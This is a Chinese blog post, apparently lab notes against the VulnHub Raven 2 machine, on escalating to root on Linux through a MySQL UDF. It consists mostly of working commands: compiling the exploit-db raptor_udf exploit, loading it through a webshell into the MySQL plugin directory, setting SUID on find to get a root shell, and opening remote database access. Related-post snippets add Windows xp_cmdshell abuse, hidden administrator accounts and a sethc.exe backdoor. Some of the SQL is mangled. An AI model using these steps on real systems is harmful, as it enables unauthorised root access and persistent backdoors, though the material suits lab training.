Linux提权--第三方软件MYSQL数据库提权(WEB+本地)

最新推荐文章于 2024-07-25 22:01:08 发布
最新推荐文章于 2024-07-25 22:01:08 发布
阅读量919 收藏 6
点赞数 22
分类专栏: # 权限提升 文章标签: 数据库 linux mysql web安全 网络安全 安全 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2303_80857229/article/details/138760311
版权

免责声明:本文仅做技术交流与学习,非法搞事后果自负...

目录

靶场镜像:

过程:

手工:

下载mysql udf poc 进行编译.

进入数据库进行UDF导出

下载(上传)

创建do_system函数调用

探针(./LinEnum.sh),查找suid权限.

配合使用find调用执行

工具:

过程:

 外连不上?

隧道出网(域控) 

数据库开外连命令:

靶场镜像:

Raven: 2 ~ VulnHub

过程:

Vulnhub某靶机-探针IP及端口-利用漏洞获取web权限-信息收集-查看数据库配置文件-利用

Mysql提权Linux(Mysql版本区别同Windows)

手工:

下载mysql udf poc 进行编译.

wget https://www.exploit-db.com/download/1518

mv 1518 raptor_udf.c

gcc -g -c raptor_udf.c

gcc -g -shared -o raptor_udf.so raptor_udf.o -lc

mv raptor_udf.so 1518.so

---下载1518.so---->上传到webshell上去.

上传或下载1518到目标服务器

wget https://xx.xx.xx.xx/1518.so

进入数据库进行UDF导出

(连接到数据库执行命令)

下载(上传)
use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/1518.so'));

select * from foo into dumpfile'/usr/lib/mysql/plugin/1518.so";
创建do_system函数调用
create function do_systemreturns integer soname'1518.so'

select do_system(chmod u+s /usr/bin/find');	
#给哪个命令一个执行权限

探针(./LinEnum.sh),查找suid权限.

--配合百科等等

find/-user root-perm -4000 -print 2>/dev/null

配合使用find调用执行

touch xiaodi

find xiaodi -exec "whoami"\;

find xiaodi -exec "/bin/sh"\;

id

工具:

Multiple.Database.Utilization.Tools-2.1.1

过程:

后门进去-->探针    Linenum.sh-->有mysql    --->找数据库的配置文件 -->用 **MDUTMDUT**连接,(这个连接有问题)--(开了外连还是连接不上)

---发现连接不上,-->用**哥斯拉**的后门连接mysql,执行命令,开启外链.

(用navicat连接试一下)

 外连不上?

连接不上,因为此靶场-->

防火墙过滤 .

开了外连 还是连接不上 查看user数据 已经设置外联.

外部到里面不行 --

1、手工提权(在webshell上面的数据库管理进行提权)自己连接自己

2.隧道出网(用外部或本机的工具项目提权建立隧道)

隧道出网(域控) 

里面出来外部

让webshell服务器3306转到本地的3300连接

--冰蝎内网穿透--http隧道 ----- MDUTMDUT连上直接提权.(数据库5种都能提)(不用考虑操作系统)

 --内网渗透后面详解...

数据库开外连命令:

GRANT ALL PRIVILEGES ON . TO '账号' IDENTIFIED BY '密码' WITH GRANT OPTION;

flush privileges;

金灰
关注
  • 22
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Linux提权——环境变量配合SUID&计划任务&第三方数据库
m0_61506558的博客
01-27 729
原始的ps命令,由于环境变量加了tmp,执行ps,即执行/tmp/ps,同时ps是通过bash复制过来的,./shell用SUID执行bash直接进行了提取。
Linux企业运维--LAMP架构---(Linux、Apache、mysql、php)
gk12050802的博客
04-24 3124
hidji
mysql提权方式linux_Linux提权的几种常用方式
weixin_32124135的博客
02-28 457
本文转载自微信公众号「Bypass」,作者Bypass 。转载本文请联系Bypass公众号。在渗透测试过程中,提升权限是非常关键的一步,攻击者往往可以通过利用内核漏洞/权限配置不当/root权限运行的服务等方式寻找突破点,来达到提升权限的目的。1、内核漏洞提权提起内核漏洞提权就不得不提到脏牛漏洞(Dirty Cow),是存在时间最长且影响范围最广的漏洞之一。低权限用户可以利用该漏洞实现本地提权,...
linux提权——Mysql UDF提权
qq_55202378的博客
04-12 633
UDF:user define fucntion,在mysql中,允许用户创建自定义函数,这些函数可以在SQL查询语句中使用,通过使用UDF,用户可以对数据库执行自定义操作。:生成位置无关代码,PIC(Position independent code),这种代码可以在内存中的任何位置执行,简单查看该EXP,在利用过程中,需要登陆到mysql数据库,新建表,在表中插入编译好的共享库,gcc编译的时候,不指定相关参数,直接接源文件,可能会有各种各样的报错。:仅仅编译源代码,不进行链接,通常生成.o文件。
MSQP Mysql数据库权限提升工具,UDF自动检测+快速反向SHELL
最新发布
07-25 182
#Mysql权限提升 #UDF自动检测 #反向SHELL建立
Linux mysql root 提权
12-30 4567
* Usage:  * $ id  * uid=500(raptor) gid=500(raptor) groups=500(raptor)  * $ gcc -g -c raptor_udf.c  * $ gcc -g -shared -W1,-soname,raptor_udf.so -o raptor_udf.so raptor_udf.o -lc  * $ mysql -u ro
linux mysql 提权
weixin_30539835的博客
03-12 347
*Usage:*$id*uid=500(raptor)gid=500(raptor)groups=500(raptor)*$gcc-g-craptor_udf.c*$gcc-g-shared-W1,-soname,raptor_udf.so-oraptor_udf.soraptor_udf.o-lc*$mysql-uroot-p*En...
linux环境下的MySQL UDF提权
黑战士的博客
04-25 1521
#1. 背景介绍###UDF(user defined function)用户自定义函数,是MySQL的一个扩展接口,称为用户自定义函数,是用来拓展MySQL的技术手段,用户通过自定义函数来实现在MySQL中无法实现的功能。文件后缀为.dll或.so,常用c语言编写。拿到一个WebShell之后,在利用操作系统本身存在的漏洞提权的时候发现补丁全部被修补。这个时候需要利用第三方应用提权。当MYSQL权限比较高的时候我们就可以利用udf提权。###利用前提mysqlfuncfunc。
基于 Vue+Vue-router+elementui +axios +nodejs+ mysql 的超市管理系统.zip
04-19
MySQL拥有庞大的开发者社区和丰富的第三方插件、库、中间件支持,提供了丰富的文档、教程、论坛以及专业服务,极大地简化了开发、运维和故障排查过程。 关键组件与日志 系统数据库 MySQL内部包含几个特殊的系统...
Linux利用UDF库实现Mysql提权
09-10
根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf
mysql提权工具
04-24
mysql自动提权工具,。。。。。。。。。。。。。。。。。。。。。。。
1433提权工具sqlTools2.chs.rar
10-23
1、 未能找到存储过程'master..xpcmdshell' 这种情况我看到网上的方法是: 第一步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第二步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 2、 原因: 126(找不到指定的模块。)。 修复方法: 第一步: dbcc dropextendedproc ("xp_cmdshell") 第二步先删除: drop procedure sp_addextendedproc drop procedure sp_oacreate exec sp_dropextendedproc 'xp_cmdshell' 第三步恢复: dbcc addextendedproc ("sp_oacreate","odsole70.dll") dbcc addextendedproc ("xp_cmdshell","xplog70.dll") 直接恢复,不管sp_addextendedproc是不是存在 3、 Error Message:SQL Server 阻止了对组件 'xp_cmdshell' 的 过程 'sys.xp_cmdshell' 的访问,因为此组件已作为此服务器安全配置的一部分而被关闭。系统管理员可以通过使用 sp_configure 启用 'xp_cmdshell'。有关启用 'xp_cmdshell' 的详细信息,请参阅 SQL Server 联机丛书中的 "外围应用配置器"。 修复方法:分离器上执行 EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE; 4、 net提权出现 拒绝访问 可以尝试一下net1 user 用户 密码 /add 如果net1也是拒绝访问可以copy一个shfit后门试试执行cmd命令:copy c:\windows\explorer.exe c:\windows\system32\sethc.exe copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe 如果提示 复制1文件 哪么证明成功了。连接终端然后按5下shift看看蹦出来了什么。玩咔咔 资源管理器,现在只要手工加个用户就好了。 5、 建号 net user chenyu chenyu$ /add net localgroup administrators chenyu /add C:\WINDOWS\system32\dllcache\net1.exe user chenyu chenyu$ /add C:\WINDOWS\system32\dllcache\net1.exe localgroup administrators chenyu /add 5、 开3389 execmaster.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--
热-MySQL是一种开源的关系型数据库管理系统
04-02
7. **社区支持**:MySQL有一个庞大的开发者社区,用户可以在官方论坛、Stack Overflow等平台获取帮助,解决问题,同时社区也提供了大量第三方工具和插件,丰富了MySQL的功能。 8. **版本更新**:MySQL有多个版本,...
mysql-8.0.20-linux-glibc2.12-x86_64.tar.gz
07-26
MySQL拥有庞大的开发者社区,提供了丰富的文档、教程和第三方工具,如Percona Toolkit、MySQL Workbench等,这些资源可以帮助用户更好地管理和维护MySQL实例。 通过理解这些知识点,你将能够成功地在Linux环境下...
linuxmysql提权
weixin_30347335的博客
03-18 554
linux提权,本文为您讲述一种linux提权方法,这是一种常见的linux提权技术.. linux系统环境下,mysql以root权限登录时提权 mysql5.x 的linux版本下面有一个函数,可以帮助我们干很多猥琐的事情,这个函数4。x下面貌似没有,原来一直没发现,也没去查函数手册,就我自己的经验来写点东西。4,x的 明天再看看函数手册,再装一个实验一下。 mysql 5.x里面引入了...
Linux提权mysql UDF提权
waxcj的博客
12-16 2113
linux mysql数据库提权
MySQL高可用解决方案:连接Oracle数据库的方法
3. **第三方解决方案**:文档提到了Linux Heartbeat与MySQL的集成,用于监控和管理服务器之间的通信,实现故障切换。此外,还有使用块复制、负载均衡、共享存储和集群代理等技术来提高MySQL的高可用性。操作系统集群...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值